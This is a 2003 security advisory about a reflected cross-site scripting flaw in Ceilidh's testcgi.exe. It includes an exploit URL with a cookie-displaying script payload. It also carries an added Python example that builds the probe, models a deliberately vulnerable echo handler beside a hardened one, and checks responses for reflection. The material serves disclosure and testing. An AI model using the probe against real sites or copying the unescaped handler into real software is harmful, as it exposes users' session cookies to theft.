
Ceilidh testcgi.exe Cross Site Scripting vuln
6th Apr 2003 [SBWID-6101]
COMMAND

	Cross Site Scripting vulnerability in Ceilidh testcgi.exe

SYSTEMS AFFECTED

	Ceilidh 2.70 and prior [http://www.lilikoi.com]

PROBLEM

	Thanks to Gregory Le Bras | Security Corporation
	[gregory.lebras@security-corporation.com], advisory [SCSA-013] :
	
	 http://www.security-corp.org/index.php?ink=4-15-1
	 http://www.security-corporation.com/index.php?id=advisories&a=013-FR
	
	
	DESCRIPTION
	________________________________________________________________________
	
	"Ceilidh is a Web-based threaded discussion engine that features
	automatic text to HTML conversion, file attachment, e-mail
	notification, automatic message expiration, multiple levels of security
	and much more."
	
	(direct quote from http://www.lilikoi.com)
	
	
	DETAILS & EXPLOITS
	________________________________________________________________________
	
	- Cross Site Scripting :
	
	An exploitable bug was found in Ceilidh that causes script execution in
	the browser of a user who follows a crafted URL.
	
	This is a reflected Cross-Site Scripting vulnerability in the file
	testcgi.exe: the query string passed to it is written back into the
	response without HTML-encoding, so an attacker can place specially
	crafted links and/or other malicious scripts in the URL and have them
	run in the victim's browser in the context of the target site.
	
	- Exploits :
	
	http://[target]/cgi-bin/testcgi.exe?[hostile_code]
	
	The hostile code could be :
	
	<script>alert("Cookie="+document.cookie)</script>
	
	(pops up an alert box showing the visitor's cookie for the target site;
	a real attack would send it to an attacker-controlled host instead.)
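	The following is an added example, not part of the original advisory
	and not the source of testcgi.exe (which is not public here). It models
	the reflecting behaviour the advisory describes with a vulnerable
	handler (`vulnerable_cgi`) beside a hardened one (`hardened_cgi`), and
	shows how to build the probe URL and check a response body for the
	probe being echoed back unencoded. All function names and the HTML
	wrapper are assumptions; only the probe payload and URL shape come from
	the advisory.

```python
"""Reflected-XSS probe and check, modelled on the Ceilidh testcgi.exe advisory.

Added example: vulnerable_cgi() is an assumption about what testcgi.exe does
(echoes QUERY_STRING into HTML), not its real source code.
"""
import html
import urllib.parse

# Payload from the advisory (SCSA-013): pops an alert with document.cookie.
PROBE = '<script>alert("Cookie="+document.cookie)</script>'


def encode_query(probe: str = PROBE) -> str:
    """Percent-encode the payload as a browser would send it in the query string."""
    return urllib.parse.quote(probe, safe="")


def build_url(target: str, probe: str = PROBE) -> str:
    """URL shape from the advisory: http://[target]/cgi-bin/testcgi.exe?[hostile_code]."""
    return f"http://{target}/cgi-bin/testcgi.exe?{encode_query(probe)}"


def vulnerable_cgi(query_string: str) -> str:
    """Assumed behaviour of testcgi.exe: decode QUERY_STRING and copy it
    straight into the HTML body. Anything that looks like markup is markup."""
    decoded = urllib.parse.unquote(query_string)
    return f"<html><body><pre>QUERY_STRING={decoded}</pre></body></html>"


def hardened_cgi(query_string: str) -> str:
    """Same page, but the value is HTML-encoded before it reaches the browser,
    so <, >, & and quotes become entities and cannot start a tag or attribute."""
    decoded = urllib.parse.unquote(query_string)
    return (
        "<html><body><pre>QUERY_STRING="
        f"{html.escape(decoded, quote=True)}</pre></body></html>"
    )


def is_reflected_unencoded(body: str, probe: str = PROBE) -> bool:
    """True when the probe appears verbatim in the response (exploitable);
    False when it is absent or came back entity-encoded."""
    return probe in body


def is_vulnerable(handler, probe: str = PROBE) -> bool:
    """Drive a handler with the encoded probe and check its response."""
    return is_reflected_unencoded(handler(encode_query(probe)), probe)


if __name__ == "__main__":
    print("probe URL:", build_url("target"))
    for name, handler in (("vulnerable", vulnerable_cgi), ("hardened", hardened_cgi)):
        print(f"{name:10s} reflects probe unencoded: {is_vulnerable(handler)}")
```

	Against a live host the same check is: request `build_url(target)` and
	run `is_reflected_unencoded()` over the body. A plain substring match is
	a first pass only; a response that re-encodes or mangles the payload
	differently still needs a manual look before it is called safe.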

SOLUTION

	No vendor fix at the time of writing. As a workaround, remove
	testcgi.exe from the cgi-bin directory or deny access to it at the web
	server unless it is actually required; the vulnerable file is a test
	CGI, not the discussion engine itself.
